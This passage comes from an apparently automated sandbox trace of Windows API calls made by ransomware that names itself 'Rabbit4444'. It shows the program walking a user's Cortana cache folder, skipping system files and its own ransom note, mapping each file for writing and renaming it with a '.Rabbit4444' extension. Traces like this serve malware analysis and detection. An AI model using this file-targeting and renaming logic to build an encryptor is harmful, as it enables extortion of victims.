(lpString1="{034FA7ED-D1B4-4D9A-971D-782B8715E040}", lpString2="..") returned 1 [0067.671] lstrcmpiW (lpString1="{034FA7ED-D1B4-4D9A-971D-782B8715E040}", lpString2="windows") returned -1 [0067.671] lstrcmpiW (lpString1="{034FA7ED-D1B4-4D9A-971D-782B8715E040}", lpString2="bootmgr") returned -1 [0067.671] lstrcmpiW (lpString1="{034FA7ED-D1B4-4D9A-971D-782B8715E040}", lpString2="pagefile.sys") returned -1 [0067.671] lstrcmpiW (lpString1="{034FA7ED-D1B4-4D9A-971D-782B8715E040}", lpString2="boot") returned -1 [0067.671] lstrcmpiW (lpString1="{034FA7ED-D1B4-4D9A-971D-782B8715E040}", lpString2="ids.txt") returned -1 [0067.671] lstrcmpiW (lpString1="{034FA7ED-D1B4-4D9A-971D-782B8715E040}", lpString2="NTUSER.DAT") returned -1 [0067.671] lstrcpyW (in: lpString1=0x130ec0e, lpString2="{034FA7ED-D1B4-4D9A-971D-782B8715E040}" | out: lpString1="{034FA7ED-D1B4-4D9A-971D-782B8715E040}") returned="{034FA7ED-D1B4-4D9A-971D-782B8715E040}" [0067.671] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\AppIconCache\\100\\{034FA7ED-D1B4-4D9A-971D-782B8715E040}", dwFileAttributes=0x0) returned 1 [0067.672] lstrlenW (lpString="{034FA7ED-D1B4-4D9A-971D-782B8715E040}") returned 38 [0067.672] lstrlenW (lpString="Rabbit4444") returned 10 [0067.672] lstrcmpiW (lpString1="B8715E040}", lpString2="Rabbit4444") returned -1 [0067.672] lstrlenW (lpString=".dll") returned 4 [0067.672] lstrcmpiW (lpString1="040}", lpString2=".dll") returned 1 [0067.672] lstrlenW (lpString=".lnk") returned 4 [0067.672] lstrcmpiW (lpString1="040}", lpString2=".lnk") returned 1 [0067.672] lstrlenW (lpString=".ini") returned 4 [0067.672] lstrcmpiW (lpString1="040}", lpString2=".ini") returned 1 [0067.672] lstrlenW (lpString=".sys") returned 4 [0067.672] lstrcmpiW (lpString1="040}", lpString2=".sys") returned 1 [0067.672] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\AppIconCache\\100\\{034FA7ED-D1B4-4D9A-971D-782B8715E040}" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\localstate\\appiconcache\\100\\{034fa7ed-d1b4-4d9a-971d-782b8715e040}"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x280 [0067.673] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0067.673] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=15898347853) returned 1 [0067.673] GetFileSizeEx (in: hFile=0x280, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=4246) returned 1 [0067.673] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117950 [0067.673] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101fb8 [0067.673] CreateFileMappingW (hFile=0x280, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x13a0, lpName=0x0) returned 0x29c [0067.674] MapViewOfFile (hFileMappingObject=0x29c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x13a0) returned 0x70000 [0067.675] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x105020 [0067.675] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108bc8 [0067.675] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105020 | out: hHeap=0xe0000) returned 1 [0067.675] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1095a0 [0067.675] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x11e1e8 [0067.675] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1095a0 | out: hHeap=0xe0000) returned 1 [0067.675] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x11e1e8 | out: hHeap=0xe0000) returned 1 [0067.675] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108bc8 | out: hHeap=0xe0000) returned 1 [0067.675] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=15898607935) returned 1 [0067.675] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117950 | out: hHeap=0xe0000) returned 1 [0067.675] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101fb8 | out: hHeap=0xe0000) returned 1 [0067.675] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0067.676] CloseHandle (hObject=0x29c) returned 1 [0067.676] CloseHandle (hObject=0x280) returned 1 [0067.676] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\AppIconCache\\100\\{034FA7ED-D1B4-4D9A-971D-782B8715E040}.Rabbit4444") returned 156 [0067.676] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\AppIconCache\\100\\{034FA7ED-D1B4-4D9A-971D-782B8715E040}" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\localstate\\appiconcache\\100\\{034fa7ed-d1b4-4d9a-971d-782b8715e040}"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\AppIconCache\\100\\{034FA7ED-D1B4-4D9A-971D-782B8715E040}.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\localstate\\appiconcache\\100\\{034fa7ed-d1b4-4d9a-971d-782b8715e040}.rabbit4444"), dwFlags=0x1) returned 1 [0067.688] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x988a6f4d, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0x988a6f4d, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x3fb43ddf, ftLastWriteTime.dwHighDateTime=0x1d336d8, nFileSizeHigh=0x0, nFileSizeLow=0x1096, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="{05A060EB-5890-4344-9370-DC1E06EC42BA}", cAlternateFileName="{05A06~1")) returned 1 [0067.688] lstrcmpiW (lpString1="{05A060EB-5890-4344-9370-DC1E06EC42BA}", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0067.688] lstrcmpiW (lpString1="{05A060EB-5890-4344-9370-DC1E06EC42BA}", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0067.688] lstrcmpiW (lpString1="{05A060EB-5890-4344-9370-DC1E06EC42BA}", lpString2="Rabbit4444.exe") returned -1 [0067.688] lstrcmpiW (lpString1="{05A060EB-5890-4344-9370-DC1E06EC42BA}", lpString2=".") returned 1 [0067.688] lstrcmpiW (lpString1="{05A060EB-5890-4344-9370-DC1E06EC42BA}", lpString2="..") returned 1 [0067.688] lstrcmpiW (lpString1="{05A060EB-5890-4344-9370-DC1E06EC42BA}", lpString2="windows") returned -1 [0067.688] lstrcmpiW (lpString1="{05A060EB-5890-4344-9370-DC1E06EC42BA}", lpString2="bootmgr") returned -1 [0067.688] lstrcmpiW (lpString1="{05A060EB-5890-4344-9370-DC1E06EC42BA}", lpString2="pagefile.sys") returned -1 [0067.688] lstrcmpiW (lpString1="{05A060EB-5890-4344-9370-DC1E06EC42BA}", lpString2="boot") returned -1 [0067.688] lstrcmpiW (lpString1="{05A060EB-5890-4344-9370-DC1E06EC42BA}", lpString2="ids.txt") returned -1 [0067.688] lstrcmpiW (lpString1="{05A060EB-5890-4344-9370-DC1E06EC42BA}", lpString2="NTUSER.DAT") returned -1 [0067.688] lstrcpyW (in: lpString1=0x130ec0e, lpString2="{05A060EB-5890-4344-9370-DC1E06EC42BA}" | out: lpString1="{05A060EB-5890-4344-9370-DC1E06EC42BA}") returned="{05A060EB-5890-4344-9370-DC1E06EC42BA}" [0067.688] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\AppIconCache\\100\\{05A060EB-5890-4344-9370-DC1E06EC42BA}", dwFileAttributes=0x0) returned 1 [0067.689] lstrlenW (lpString="{05A060EB-5890-4344-9370-DC1E06EC42BA}") returned 38 [0067.689] lstrlenW (lpString="Rabbit4444") returned 10 [0067.689] lstrcmpiW (lpString1="E06EC42BA}", lpString2="Rabbit4444") returned -1 [0067.689] lstrlenW (lpString=".dll") returned 4 [0067.689] lstrcmpiW (lpString1="2BA}", lpString2=".dll") returned 1 [0067.689] lstrlenW (lpString=".lnk") returned 4 [0067.689] lstrcmpiW (lpString1="2BA}", lpString2=".lnk") returned 1 [0067.689] lstrlenW (lpString=".ini") returned 4 [0067.689] lstrcmpiW (lpString1="2BA}", lpString2=".ini") returned 1 [0067.689] lstrlenW (lpString=".sys") returned 4 [0067.689] lstrcmpiW (lpString1="2BA}", lpString2=".sys") returned 1 [0067.689] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\AppIconCache\\100\\{05A060EB-5890-4344-9370-DC1E06EC42BA}" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\localstate\\appiconcache\\100\\{05a060eb-5890-4344-9370-dc1e06ec42ba}"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x280 [0067.690] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0067.690] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=15900038895) returned 1 [0067.690] GetFileSizeEx (in: hFile=0x280, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=4246) returned 1 [0067.690] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117d10 [0067.690] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101738 [0067.690] CreateFileMappingW (hFile=0x280, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x13a0, lpName=0x0) returned 0x29c [0067.692] MapViewOfFile (hFileMappingObject=0x29c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x13a0) returned 0x70000 [0067.693] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x105020 [0067.693] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109488 [0067.693] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105020 | out: hHeap=0xe0000) returned 1 [0067.693] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108f10 [0067.693] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x11e1e8 [0067.694] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108f10 | out: hHeap=0xe0000) returned 1 [0067.694] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x11e1e8 | out: hHeap=0xe0000) returned 1 [0067.694] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109488 | out: hHeap=0xe0000) returned 1 [0067.694] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=15900444781) returned 1 [0067.694] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117d10 | out: hHeap=0xe0000) returned 1 [0067.694] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101738 | out: hHeap=0xe0000) returned 1 [0067.694] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0067.694] CloseHandle (hObject=0x29c) returned 1 [0067.694] CloseHandle (hObject=0x280) returned 1 [0067.694] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\AppIconCache\\100\\{05A060EB-5890-4344-9370-DC1E06EC42BA}.Rabbit4444") returned 156 [0067.694] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\AppIconCache\\100\\{05A060EB-5890-4344-9370-DC1E06EC42BA}" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\localstate\\appiconcache\\100\\{05a060eb-5890-4344-9370-dc1e06ec42ba}"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\AppIconCache\\100\\{05A060EB-5890-4344-9370-DC1E06EC42BA}.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\localstate\\appiconcache\\100\\{05a060eb-5890-4344-9370-dc1e06ec42ba}.rabbit4444"), dwFlags=0x1) returned 1 [0067.695] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x98703565, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0x98703565, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x3fb43ddf, ftLastWriteTime.dwHighDateTime=0x1d336d8, nFileSizeHigh=0x0, nFileSizeLow=0x1096, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="{06A6D43F-8744-4A41-B9CE-FFA8570069CC}", cAlternateFileName="{06A6D~1")) returned 1 [0067.695] lstrcmpiW (lpString1="{06A6D43F-8744-4A41-B9CE-FFA8570069CC}", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0067.695] lstrcmpiW (lpString1="{06A6D43F-8744-4A41-B9CE-FFA8570069CC}", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0067.695] lstrcmpiW (lpString1="{06A6D43F-8744-4A41-B9CE-FFA8570069CC}", lpString2="Rabbit4444.exe") returned -1 [0067.695] lstrcmpiW (lpString1="{06A6D43F-8744-4A41-B9CE-FFA8570069CC}", lpString2=".") returned 1 [0067.695] lstrcmpiW (lpString1="{06A6D43F-8744-4A41-B9CE-FFA8570069CC}", lpString2="..") returned 1 [0067.695] lstrcmpiW (lpString1="{06A6D43F-8744-4A41-B9CE-FFA8570069CC}", lpString2="windows") returned -1 [0067.695] lstrcmpiW (lpString1="{06A6D43F-8744-4A41-B9CE-FFA8570069CC}", lpString2="bootmgr") returned -1 [0067.695] lstrcmpiW (lpString1="{06A6D43F-8744-4A41-B9CE-FFA8570069CC}", lpString2="pagefile.sys") returned -1 [0067.695] lstrcmpiW (lpString1="{06A6D43F-8744-4A41-B9CE-FFA8570069CC}", lpString2="boot") returned -1 [0067.695] lstrcmpiW (lpString1="{06A6D43F-8744-4A41-B9CE-FFA8570069CC}", lpString2="ids.txt") returned -1 [0067.695] lstrcmpiW (lpString1="{06A6D43F-8744-4A41-B9CE-FFA8570069CC}", lpString2="NTUSER.DAT") returned -1 [0067.695] lstrcpyW (in: lpString1=0x130ec0e, lpString2="{06A6D43F-8744-4A41-B9CE-FFA8570069CC}" | out: lpString1="{06A6D43F-8744-4A41-B9CE-FFA8570069CC}") returned="{06A6D43F-8744-4A41-B9CE-FFA8570069CC}" [0067.695] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\AppIconCache\\100\\{06A6D43F-8744-4A41-B9CE-FFA8570069CC}", dwFileAttributes=0x0) returned 1 [0067.695] lstrlenW (lpString="{06A6D43F-8744-4A41-B9CE-FFA8570069CC}") returned 38 [0067.695] lstrlenW (lpString="Rabbit4444") returned 10 [0067.695] lstrcmpiW (lpString1="8570069CC}", lpString2="Rabbit4444") returned -1 [0067.695] lstrlenW (lpString=".dll") returned 4 [0067.695] lstrcmpiW (lpString1="9CC}", lpString2=".dll") returned 1 [0067.695] lstrlenW (lpString=".lnk") returned 4 [0067.696] lstrcmpiW (lpString1="9CC}", lpString2=".lnk") returned 1 [0067.696] lstrlenW (lpString=".ini") returned 4 [0067.696] lstrcmpiW (lpString1="9CC}", lpString2=".ini") returned 1 [0067.696] lstrlenW (lpString=".sys") returned 4 [0067.696] lstrcmpiW (lpString1="9CC}", lpString2=".sys") returned 1 [0067.696] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\AppIconCache\\100\\{06A6D43F-8744-4A41-B9CE-FFA8570069CC}" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\localstate\\appiconcache\\100\\{06a6d43f-8744-4a41-b9ce-ffa8570069cc}"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x280 [0067.696] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0067.696] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=15900678514) returned 1 [0067.696] GetFileSizeEx (in: hFile=0x280, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=4246) returned 1 [0067.696] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117ab8 [0067.696] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x1015a0 [0067.696] CreateFileMappingW (hFile=0x280, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x13a0, lpName=0x0) returned 0x29c [0067.697] MapViewOfFile (hFileMappingObject=0x29c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x13a0) returned 0x70000 [0067.698] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x105020 [0067.698] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1097d0 [0067.698] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105020 | out: hHeap=0xe0000) returned 1 [0067.698] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109028 [0067.698] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x11e1e8 [0067.699] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109028 | out: hHeap=0xe0000) returned 1 [0067.699] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x11e1e8 | out: hHeap=0xe0000) returned 1 [0067.699] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1097d0 | out: hHeap=0xe0000) returned 1 [0067.699] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=15900957081) returned 1 [0067.699] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117ab8 | out: hHeap=0xe0000) returned 1 [0067.699] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1015a0 | out: hHeap=0xe0000) returned 1 [0067.699] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0067.699] CloseHandle (hObject=0x29c) returned 1 [0067.699] CloseHandle (hObject=0x280) returned 1 [0067.699] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\AppIconCache\\100\\{06A6D43F-8744-4A41-B9CE-FFA8570069CC}.Rabbit4444") returned 156 [0067.699] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\AppIconCache\\100\\{06A6D43F-8744-4A41-B9CE-FFA8570069CC}" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\localstate\\appiconcache\\100\\{06a6d43f-8744-4a41-b9ce-ffa8570069cc}"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\AppIconCache\\100\\{06A6D43F-8744-4A41-B9CE-FFA8570069CC}.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\localstate\\appiconcache\\100\\{06a6d43f-8744-4a41-b9ce-ffa8570069cc}.rabbit4444"), dwFlags=0x1) returned 1 [0067.700] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x98703565, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0x98703565, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x3fb43ddf, ftLastWriteTime.dwHighDateTime=0x1d336d8, nFileSizeHigh=0x0, nFileSizeLow=0x1096, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="{07E7709A-2252-4F64-93C1-4DBAB210817B}", cAlternateFileName="{07E77~1")) returned 1 [0067.700] lstrcmpiW (lpString1="{07E7709A-2252-4F64-93C1-4DBAB210817B}", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0067.700] lstrcmpiW (lpString1="{07E7709A-2252-4F64-93C1-4DBAB210817B}", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0067.700] lstrcmpiW (lpString1="{07E7709A-2252-4F64-93C1-4DBAB210817B}", lpString2="Rabbit4444.exe") returned -1 [0067.700] lstrcmpiW (lpString1="{07E7709A-2252-4F64-93C1-4DBAB210817B}", lpString2=".") returned 1 [0067.700] lstrcmpiW (lpString1="{07E7709A-2252-4F64-93C1-4DBAB210817B}", lpString2="..") returned 1 [0067.700] lstrcmpiW (lpString1="{07E7709A-2252-4F64-93C1-4DBAB210817B}", lpString2="windows") returned -1 [0067.700] lstrcmpiW (lpString1="{07E7709A-2252-4F64-93C1-4DBAB210817B}", lpString2="bootmgr") returned -1 [0067.700] lstrcmpiW (lpString1="{07E7709A-2252-4F64-93C1-4DBAB210817B}", lpString2="pagefile.sys") returned -1 [0067.700] lstrcmpiW (lpString1="{07E7709A-2252-4F64-93C1-4DBAB210817B}", lpString2="boot") returned -1 [0067.700] lstrcmpiW (lpString1="{07E7709A-2252-4F64-93C1-4DBAB210817B}", lpString2="ids.txt") returned -1 [0067.700] lstrcmpiW (lpString1="{07E7709A-2252-4F64-93C1-4DBAB210817B}", lpString2="NTUSER.DAT") returned -1 [0067.700] lstrcpyW (in: lpString1=0x130ec0e, lpString2="{07E7709A-2252-4F64-93C1-4DBAB210817B}" | out: lpString1="{07E7709A-2252-4F64-93C1-4DBAB210817B}") returned="{07E7709A-2252-4F64-93C1-4DBAB210817B}" [0067.700] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\AppIconCache\\100\\{07E7709A-2252-4F64-93C1-4DBAB210817B}", dwFileAttributes=0x0) returned 1 [0067.701] lstrlenW (lpString="{07E7709A-2252-4F64-93C1-4DBAB210817B}") returned 38 [0067.701] lstrlenW (lpString="Rabbit4444") returned 10 [0067.701] lstrcmpiW (lpString1="AB210817B}", lpString2="Rabbit4444") returned -1 [0067.701] lstrlenW (lpString=".dll") returned 4 [0067.701] lstrcmpiW (lpString1="17B}", lpString2=".dll") returned 1 [0067.701] lstrlenW (lpString=".lnk") returned 4 [0067.701] lstrcmpiW (lpString1="17B}", lpString2=".lnk") returned 1 [0067.701] lstrlenW (lpString=".ini") returned 4 [0067.701] lstrcmpiW (lpString1="17B}", lpString2=".ini") returned 1 [0067.701] lstrlenW (lpString=".sys") returned 4 [0067.701] lstrcmpiW (lpString1="17B}", lpString2=".sys") returned 1 [0067.701] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\AppIconCache\\100\\{07E7709A-2252-4F64-93C1-4DBAB210817B}" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\localstate\\appiconcache\\100\\{07e7709a-2252-4f64-93c1-4dbab210817b}"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x280 [0067.701] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0067.701] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=15901212869) returned 1 [0067.701] GetFileSizeEx (in: hFile=0x280, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=4246) returned 1 [0067.701] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117c98 [0067.702] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101408 [0067.702] CreateFileMappingW (hFile=0x280, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x13a0, lpName=0x0) returned 0x29c [0067.703] MapViewOfFile (hFileMappingObject=0x29c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x13a0) returned 0x70000 [0067.703] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x105020 [0067.703] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1095a0 [0067.703] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105020 | out: hHeap=0xe0000) returned 1 [0067.703] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108ce0 [0067.704] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x11e1e8 [0067.704] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108ce0 | out: hHeap=0xe0000) returned 1 [0067.704] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x11e1e8 | out: hHeap=0xe0000) returned 1 [0067.704] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1095a0 | out: hHeap=0xe0000) returned 1 [0067.704] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=15901465307) returned 1 [0067.704] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117c98 | out: hHeap=0xe0000) returned 1 [0067.704] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101408 | out: hHeap=0xe0000) returned 1 [0067.704] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0067.704] CloseHandle (hObject=0x29c) returned 1 [0067.704] CloseHandle (hObject=0x280) returned 1 [0067.704] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\AppIconCache\\100\\{07E7709A-2252-4F64-93C1-4DBAB210817B}.Rabbit4444") returned 156 [0067.704] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\LocalState\\AppIconCache\\100\\{07E7709A-2252-4F64-93C1-4DBAB210817B}" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\localstate\\appiconcache\\100\\{07e7709a-2252-4f64-93c1-4dbab210817b}"), 